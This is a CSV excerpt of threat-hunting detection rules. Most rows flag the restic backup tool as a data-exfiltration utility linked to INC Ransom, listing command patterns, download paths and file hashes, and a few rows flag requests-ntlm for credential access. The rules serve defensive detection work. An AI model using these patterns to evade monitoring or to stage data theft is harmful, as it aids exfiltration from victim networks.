"* install requests_ntlm*",".{0,1000}\sinstall\srequests_ntlm.{0,1000}","greyware_tool_keyword","requests-ntlm","HTTP NTLM Authentication for Requests Library","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://pypi.org/project/requests-ntlm/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*from requests_ntlm import HttpNtlmAuth*",".{0,1000}from\srequests_ntlm\simport\sHttpNtlmAuth.{0,1000}","greyware_tool_keyword","requests-ntlm","HTTP NTLM Authentication for Requests Library","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://pypi.org/project/requests-ntlm/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"* -r rclone:* init*",".{0,1000}\s\-r\srclone\:.{0,1000}\sinit.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"* restic.exe*",".{0,1000}\srestic\.exe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"* restic/restic *",".{0,1000}\srestic\/restic\s.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*/restic-*.tar.gz*",".{0,1000}\/restic\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*/restic.exe*",".{0,1000}\/restic\.exe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*/restic/releases/download/*",".{0,1000}\/restic\/releases\/download\/.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*/restic_*_windows_amd64.zip*",".{0,1000}\/restic_.{0,1000}_windows_amd64\.zip.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*/restic-master/*",".{0,1000}\/restic\-master\/.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*\restic-*.tar.gz*",".{0,1000}\\restic\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*\restic.exe*",".{0,1000}\\restic\.exe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*\RESTIC_*_WINDOWS_AMD64.E-FC5783E7.pf*",".{0,1000}\\RESTIC_.{0,1000}_WINDOWS_AMD64\.E\-FC5783E7\.pf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*\restic_*_windows_amd64.zip*",".{0,1000}\\restic_.{0,1000}_windows_amd64\.zip.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*\restic-completion.ps1*",".{0,1000}\\restic\-completion\.ps1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*\restic-master\*",".{0,1000}\\restic\-master\\.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*031cf34eeafe09064a6b63bcf752093d742b89166e93924aa4dde13160f91301*",".{0,1000}031cf34eeafe09064a6b63bcf752093d742b89166e93924aa4dde13160f91301.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*03d40eba61566209bd634bde4492e7adcc34e8cfa94a6e2e72e0136c21534d8b*",".{0,1000}03d40eba61566209bd634bde4492e7adcc34e8cfa94a6e2e72e0136c21534d8b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*03eec0acc40aaf248498e956528de90b8f7efc854ae8a0d0ccf5ed7377bd4e71*",".{0,1000}03eec0acc40aaf248498e956528de90b8f7efc854ae8a0d0ccf5ed7377bd4e71.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*03f1fdbd7837c1934ce54d05f2ec947c62a45e93e68b7cf7d612310e095a1626*",".{0,1000}03f1fdbd7837c1934ce54d05f2ec947c62a45e93e68b7cf7d612310e095a1626.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0416febc1e9447269a9b414f0bbfe0172453fb5d03f0a756eca799060b1db6d5*",".{0,1000}0416febc1e9447269a9b414f0bbfe0172453fb5d03f0a756eca799060b1db6d5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0440615136eecfa56e9844e37679738622563c126c9cafb96433cec4ba11699a*",".{0,1000}0440615136eecfa56e9844e37679738622563c126c9cafb96433cec4ba11699a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0440b6c1c17b58563c729fa133896199406f29356329ca5d048e4d9dcbf7d6fe*",".{0,1000}0440b6c1c17b58563c729fa133896199406f29356329ca5d048e4d9dcbf7d6fe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*054cb9f42c4aca898ef078ddb7b138517c6f9f80225f9c7204f6ee00b9b93134*",".{0,1000}054cb9f42c4aca898ef078ddb7b138517c6f9f80225f9c7204f6ee00b9b93134.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0550e9375d01e30924e8e551ddab23e2422afdb978348b73e51f912cff544633*",".{0,1000}0550e9375d01e30924e8e551ddab23e2422afdb978348b73e51f912cff544633.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*066ab67daf36067b99c2c0346d95f69372e5b38a0917396d2470713684e965f4*",".{0,1000}066ab67daf36067b99c2c0346d95f69372e5b38a0917396d2470713684e965f4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*067fbc0cf0eee4afdc361e12bd03b266e80e85a726647e53709854ec142dd94e*",".{0,1000}067fbc0cf0eee4afdc361e12bd03b266e80e85a726647e53709854ec142dd94e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*06bf3107ccb34b3c144d07ed52a0f39ae0f011d3af0cb951b2927ae2350c4631*",".{0,1000}06bf3107ccb34b3c144d07ed52a0f39ae0f011d3af0cb951b2927ae2350c4631.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*076a40a96cbd1931e456facffc9f1f3bc863a5b4f9e2eb95749952e8c03400af*",".{0,1000}076a40a96cbd1931e456facffc9f1f3bc863a5b4f9e2eb95749952e8c03400af.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*07cb932052b68c612875bca687f2a223359c2df6aaf6356710253fcda2b0fb5a*",".{0,1000}07cb932052b68c612875bca687f2a223359c2df6aaf6356710253fcda2b0fb5a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0820eee2fc73291dffd3794511099582b2b5dc0e5e112fea75100e64834f95f4*",".{0,1000}0820eee2fc73291dffd3794511099582b2b5dc0e5e112fea75100e64834f95f4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*084a42ddb25d1cdec5b607e7ef814c6feb7e644fe4d7648b28c590c705d1abf1*",".{0,1000}084a42ddb25d1cdec5b607e7ef814c6feb7e644fe4d7648b28c590c705d1abf1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*084e97e9ebab79b4fe01d48f70c81cfbdc45d811265f3987eb7c322be34e39d0*",".{0,1000}084e97e9ebab79b4fe01d48f70c81cfbdc45d811265f3987eb7c322be34e39d0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*086848f2d4683ed2d581b584648d5c9c1bfe9ff61b85005c8a6477079f58b95d*",".{0,1000}086848f2d4683ed2d581b584648d5c9c1bfe9ff61b85005c8a6477079f58b95d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*08bb9b6592f50f08dcdd69a834028520f03e3186e530e69135f91ffc71d63e1a*",".{0,1000}08bb9b6592f50f08dcdd69a834028520f03e3186e530e69135f91ffc71d63e1a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*08cd75e56a67161e9b16885816f04b2bf1fb5b03bc0677b0ccf3812781c1a2ec*",".{0,1000}08cd75e56a67161e9b16885816f04b2bf1fb5b03bc0677b0ccf3812781c1a2ec.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*08eee3c5dfdc940f19deba942d5bd9a9e824cdfd1212db7eead5644f556f7a9e*",".{0,1000}08eee3c5dfdc940f19deba942d5bd9a9e824cdfd1212db7eead5644f556f7a9e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*08ef26797923f93bb5a395f7d4e4bf9bddab731f0c38c29cdd843848f7b3bc89*",".{0,1000}08ef26797923f93bb5a395f7d4e4bf9bddab731f0c38c29cdd843848f7b3bc89.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0900453b3118e8907fd19a1bb4b56d29c3f09b20d1eaccc773e888f80761d065*",".{0,1000}0900453b3118e8907fd19a1bb4b56d29c3f09b20d1eaccc773e888f80761d065.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*091518fa5ffd54b71b90eaefdf9d8d05fbf0da1b5585d39ec9e202bf9c448a47*",".{0,1000}091518fa5ffd54b71b90eaefdf9d8d05fbf0da1b5585d39ec9e202bf9c448a47.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0915925d325e078508375c4ffbd4570c392c13640977a05e19db330a75ab510a*",".{0,1000}0915925d325e078508375c4ffbd4570c392c13640977a05e19db330a75ab510a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0a8ce786d48460aa1d4a75624c19262482df822fc36906461d602bb9451b2d3a*",".{0,1000}0a8ce786d48460aa1d4a75624c19262482df822fc36906461d602bb9451b2d3a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0ac18d8f1ea7306f3d76df0d034de4b2ae839027e88a86073f4745cfa181af2c*",".{0,1000}0ac18d8f1ea7306f3d76df0d034de4b2ae839027e88a86073f4745cfa181af2c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0af3ca934eb27efcb04923f478a90528eddc5ad8ffc4c0b183d83896383eaffe*",".{0,1000}0af3ca934eb27efcb04923f478a90528eddc5ad8ffc4c0b183d83896383eaffe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0b2bc7f3b6b1117924d30ce00aba145b572893f69289c1e8da24ab545ffc16eb*",".{0,1000}0b2bc7f3b6b1117924d30ce00aba145b572893f69289c1e8da24ab545ffc16eb.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0b6ea556073812f430482992e60bffc80ca1134bd83b05a0575f577498833c86*",".{0,1000}0b6ea556073812f430482992e60bffc80ca1134bd83b05a0575f577498833c86.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0bcf557bb9fdac75b80c93f575ff2810e7c7c30b9fbf895f424c046d43c7cc68*",".{0,1000}0bcf557bb9fdac75b80c93f575ff2810e7c7c30b9fbf895f424c046d43c7cc68.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0bec24bf1d313b22de9c879bf3803256f945be419f23db4e58fdb73c3f15ec31*",".{0,1000}0bec24bf1d313b22de9c879bf3803256f945be419f23db4e58fdb73c3f15ec31.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0c19de7f525b4f40bf35347c9834564e48cdfdf1b64972d0aef9e548d29960dd*",".{0,1000}0c19de7f525b4f40bf35347c9834564e48cdfdf1b64972d0aef9e548d29960dd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0c209fa7735b7a129d52fe5defb41289d878233480d2660803045811ba40a62f*",".{0,1000}0c209fa7735b7a129d52fe5defb41289d878233480d2660803045811ba40a62f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0cf697c88404b180d6d6ff2e7d2c27b2fcb9536da6dbdf15ad4d320af7e8f17c*",".{0,1000}0cf697c88404b180d6d6ff2e7d2c27b2fcb9536da6dbdf15ad4d320af7e8f17c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0e0f4b20b92d63623bd0abfc7a233a26a66834efb8a36d67c9dd14fdd973822d*",".{0,1000}0e0f4b20b92d63623bd0abfc7a233a26a66834efb8a36d67c9dd14fdd973822d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0e8ddd8fb30e6bddc6204052e06957a39a85536f5cb89e1c813d9eff3d3977cf*",".{0,1000}0e8ddd8fb30e6bddc6204052e06957a39a85536f5cb89e1c813d9eff3d3977cf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0e95898310ad782ee54b42098c6b43b7c3e3b58a44e7f841d6533e441f011164*",".{0,1000}0e95898310ad782ee54b42098c6b43b7c3e3b58a44e7f841d6533e441f011164.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0ebaf56b7fe452a53e760b44bfa69331bb6b03dda5b538b69a5b8642e12a8b41*",".{0,1000}0ebaf56b7fe452a53e760b44bfa69331bb6b03dda5b538b69a5b8642e12a8b41.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*0fc75aed0d84a67a75a937e4543fe2c324dc2e4422ea8d0431ec63ac15cbde16*",".{0,1000}0fc75aed0d84a67a75a937e4543fe2c324dc2e4422ea8d0431ec63ac15cbde16.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*10b3f5491e54c82b421980e848542f8f589ad6635f83fb2d89d9996cb37ac9c7*",".{0,1000}10b3f5491e54c82b421980e848542f8f589ad6635f83fb2d89d9996cb37ac9c7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*11b9976846f11e0d163abe45ab025ef7b26ce86a94dda613bfd8e4b51eb63bb6*",".{0,1000}11b9976846f11e0d163abe45ab025ef7b26ce86a94dda613bfd8e4b51eb63bb6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*11d6ee35ec73058dae73d31d9cd17fe79661090abeb034ec6e13e3c69a4e7088*",".{0,1000}11d6ee35ec73058dae73d31d9cd17fe79661090abeb034ec6e13e3c69a4e7088.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*120dca6c0da5706f7868b653f74eedac4e218b3d155a1963d66302d9eb363511*",".{0,1000}120dca6c0da5706f7868b653f74eedac4e218b3d155a1963d66302d9eb363511.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1219aed961e396fb1be1c2a86218cc72de87bcc4461f22f9d87cd1fccf7fc30c*",".{0,1000}1219aed961e396fb1be1c2a86218cc72de87bcc4461f22f9d87cd1fccf7fc30c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*124438413ba085530b9a0ec928dbcec411a401e0127940bd8d439072e054e2d2*",".{0,1000}124438413ba085530b9a0ec928dbcec411a401e0127940bd8d439072e054e2d2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*12d51bd60e658ef48f066fb5c872382fe0ad60a7665985e25895651c78019d2d*",".{0,1000}12d51bd60e658ef48f066fb5c872382fe0ad60a7665985e25895651c78019d2d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1386e1efbcc9585fdc22c8a1f453b7da8b0f97b1a0e339cef1d26753bc368096*",".{0,1000}1386e1efbcc9585fdc22c8a1f453b7da8b0f97b1a0e339cef1d26753bc368096.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*15229ecd98cf8496d02e8a4918a27099d2e8202e559e5d2e3e92b4cdc4bcc5ec*",".{0,1000}15229ecd98cf8496d02e8a4918a27099d2e8202e559e5d2e3e92b4cdc4bcc5ec.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*160fbd38f7e626afc5f99a239776423629bd4b1e6cb9891c7ecf1a08acae06a4*",".{0,1000}160fbd38f7e626afc5f99a239776423629bd4b1e6cb9891c7ecf1a08acae06a4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*1636a30b0c9e7c1a9411d30696df2a2a62666ae30f8cdf14a0f71d3715c897c0*",".{0,1000}1636a30b0c9e7c1a9411d30696df2a2a62666ae30f8cdf14a0f71d3715c897c0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
